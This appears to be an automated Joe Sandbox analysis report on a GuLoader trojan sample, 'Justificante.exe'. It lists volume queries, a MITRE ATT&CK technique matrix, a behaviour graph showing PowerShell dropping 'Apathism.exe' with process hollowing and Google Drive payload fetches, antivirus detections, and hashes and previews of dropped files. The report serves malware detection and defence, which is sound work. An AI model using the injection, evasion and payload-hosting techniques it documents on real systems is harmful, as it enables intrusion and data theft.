      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping1
      Query Registry
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Shared Modules
      Boot or Logon Initialization Scripts411
      Process Injection
      131
      Virtualization/Sandbox Evasion
      LSASS Memory321
      Security Software Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
      Process Injection
      NTDS131
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials2
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing
      DCSync114
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539381 Sample: Justificante.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 3 other signatures 2->50 8 Justificante.exe 2 43 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\...\Daredeviltry.Unw, ASCII 8->22 dropped 52 Suspicious powershell command line found 8->52 12 powershell.exe 26 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\Local\...\Apathism.exe, PE32 12->24 dropped 26 C:\Users\...\Apathism.exe:Zone.Identifier, ASCII 12->26 dropped 54 Early bird code injection technique detected 12->54 56 Writes to foreign memory regions 12->56 58 Sample uses process hollowing technique 12->58 60 5 other signatures 12->60 16 Apathism.exe 6 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 drive.google.com 142.250.184.238, 443, 49713 GOOGLEUS United States 16->28 30 drive.usercontent.google.com 142.250.186.97, 443, 49715 GOOGLEUS United States 16->30 36 Antivirus detection for dropped file 16->36 38 Multi AV Scanner detection for dropped file 16->38 40 Hides threads from debuggers 16->40 42 Switches to a custom stack to bypass stack traces 16->42 signatures12

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Justificante.exe39%ReversingLabsWin32.Trojan.Guloader
      Justificante.exe100%AviraTR/Agent.lfkxa
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Apathism.exe100%AviraTR/Agent.lfkxa
      C:\Users\user\AppData\Local\Temp\Apathism.exe39%ReversingLabsWin32.Trojan.Guloader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://apis.google.com0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.184.238
      truefalse
        unknown
        drive.usercontent.google.com
        142.250.186.97
        truefalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comApathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://drive.google.com/Apathism.exe, 00000007.00000002.2600537103.0000000006648000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://contoso.com/powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmpfalse
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.ftp.ftp://ftp.gopher.Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmpfalse
                    unknown
                    https://drive.usercontent.google.com/Apathism.exe, 00000007.00000003.2563435185.00000000066D8000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000002.2600695296.00000000066D9000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://apis.google.comApathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorJustificante.exe, 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Justificante.exe, 00000000.00000000.1417744480.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Apathism.exe, 00000007.00000000.2138832756.000000000040A000.00000008.00000001.01000000.00000009.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.184.238
                        drive.google.comUnited States
                        15169GOOGLEUSfalse
                        142.250.186.97
                        drive.usercontent.google.comUnited States
                        15169GOOGLEUSfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1539381
                        Start date and time:2024-10-22 16:02:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 30s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Justificante.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@6/18@2/2
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 84
                        • Number of non-executed functions: 293
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 3892 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Justificante.exe
                        TimeTypeDescription
                        10:03:14API Interceptor40x Sleep call for process: powershell.exe modified
                        10:05:04API Interceptor3x Sleep call for process: Apathism.exe modified
                        No context
                        No context
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e196 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        phc.exeGet hashmaliciousUnknownBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        phc.exeGet hashmaliciousUnknownBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        Fignen234.exeGet hashmaliciousGuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        Fignen234.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        zamowienie.exeGet hashmaliciousGuLoaderBrowse
                        • 142.250.186.97
                        • 142.250.184.238
                        No context
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):14744
                        Entropy (8bit):4.992175361088568
                        Encrypted:false
                        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                        MD5:A35685B2B980F4BD3C6FD278EA661412
                        SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                        SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                        SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):777760
                        Entropy (8bit):7.723680980803217
                        Encrypted:false
                        SSDEEP:12288:RgeuCaz4Fr0BktHwDmKoNxlA8rQt9P9g1WyQ9OpERjsOwfJnuW8EnIu5OQ:Rgwa0FzwDzoO8LWyQ9ySjYfJu1cl
                        MD5:73FD5954CB5BE48EA11D738097FDDA5A
                        SHA1:6AAB0CB9DDB07D3C3386E6FF72C2F969339E31F7
                        SHA-256:27D88A843003BF67D0BF917DB5A57620810B08C76C91E18D00C3D89C7D459545
                        SHA-512:BAB35C114448DC2A6F6BBB374BC2B006A9C5E7DF2653F2A8A9A616AE3CE70B22E25311986AED72415E8D3F448D293A849FA4A557690D5B9748305D50E93E6C36
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 39%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....`.................f...*.......5............@.................................}.....@.............................................x...........0................................................................................................text...re.......f.................. ..`.rdata...............j..............@..@.data...x............~..............@....ndata...P...............................rsrc...x...........................@..@................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2581686
                        Entropy (8bit):2.1671868544258412
                        Encrypted:false
                        SSDEEP:6144:zcuO/BLmJ+oQnJRCc0q06WIBmTadgJjNf8YRPQiU3z5jc7iwrBxUVqakRr3l2BXU:zcu6l/nJRDRWIB7NzZs1BSkjkBX3+b
                        MD5:1FD09E00586533D7101744C7D4A77A8D
                        SHA1:B821E347415A4AABD126315B558111ABDC3D22E5
                        SHA-256:62A8BF9F4B478FC91C7076FFC09E9358E90927FCF73AA6A072FAB3D01F104DD6
                        SHA-512:27E24F23B6206ECA1456271BC761813B9EBFB99C78173556FDEED1CA31B336BECA52BB526B1160116EDEBCF7C98256663E60B5B200502F61FB49465FE777BE12
                        Malicious:false
                        Preview:.G......,.......,.......\.......p)......`F......VG..........................f................... s_.........................................................................................................................................................................................G...Y...........i...j...............................................................................................................................h...............................................................g...............................................................3...........j...,.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):442181
                        Entropy (8bit):1.2617782727671476
                        Encrypted:false
                        SSDEEP:1536:SPxZsv+aBrcJ8vc7p6PE2de6DypPQKuO4du0+:g+PYtOOpPQrk
                        MD5:B6132BC7470969ED73701D454E5D4494
                        SHA1:174B74CD04726AF2549697685D1C738105405717
                        SHA-256:341DDDFDC91CFEE857A23B24E52F3E7DE1DE9346B3C1276E77431A7B740B962A
                        SHA-512:E130B771718A0B1CF7701812E3F2EE0A9C3FA164111C306B6F9412CF2C67D8E92C8E6BF6F359A379A8390018E10D317B78A779C9C29CCCD77E285874B64682FA
                        Malicious:false
                        Preview:...................................m...q.....................................F.................&.............`..................................................W........................................J...P....................................I=..................Nj6..............>e....................................................C............................./6................?.........u.........................."..............................v............>.............z............n........\............................................7..........................~...........................................................P..............,..............M............H...............7......\....D....................................R.............../.........................................................&..........................................}............m...................................................+..................w................................Q..........................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:ASCII text, with very long lines (2987), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):52318
                        Entropy (8bit):5.322326963365616
                        Encrypted:false
                        SSDEEP:1536:6jQKMnINZTb11GdIEsKP0I/6KLwa++r4qQJ+Xlul4BU:hKMIXTpg2WLG+rvl4
                        MD5:57B432B0C43C8C1986125E2BF1ADC44F
                        SHA1:CA317042F46D3D8050CEAA3810481BFFAE830CF7
                        SHA-256:7856E5963B5C004408DE99F050232CAB859FCA1A7637FA1D2AE645D65B6451FA
                        SHA-512:D81E8A85DD3002EB0A38F5B769CF9EF8A71FA8FE213EB76438C2147A80BC2B430840BF12800054EFB5A9A7C267987C3349F53E9C282D408ADB4B1C7885A51084
                        Malicious:true
